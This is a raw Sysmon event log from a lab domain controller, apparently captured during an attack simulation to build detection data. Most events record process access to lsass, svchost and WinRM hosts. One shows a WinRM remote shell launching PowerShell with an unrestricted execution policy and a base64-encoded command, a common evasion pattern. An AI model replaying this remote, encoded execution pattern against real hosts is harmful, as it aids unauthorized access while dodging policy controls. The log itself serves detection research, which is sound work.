10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-1103-000000007E01}5060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3DD6-5F80-0F03-000000007E01}27884760C:\Windows\system32\WinrsHost.exe{733EE690-3DD6-5F80-1103-000000007E01}5060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.808{733EE690-3DD6-5F80-1103-000000007E01}5060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-41DA-110000000000}0x11da410HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3DD6-5F80-0F03-000000007E01}2788C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C69-5F80-1400-000000007E01}13321428C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0F03-000000007E01}2788C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.781{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0F03-000000007E01}2788C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.781{733EE690-3DD6-5F80-1003-000000007E01}43285048C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0F03-000000007E01}2788C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-1003-000000007E01}4328C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0F03-000000007E01}2788C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0F03-000000007E01}2788C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.776{733EE690-3DD6-5F80-0F03-000000007E01}2788C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-41DA-110000000000}0x11da410HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3C68-5F80-0C00-000000007E01}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.765{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 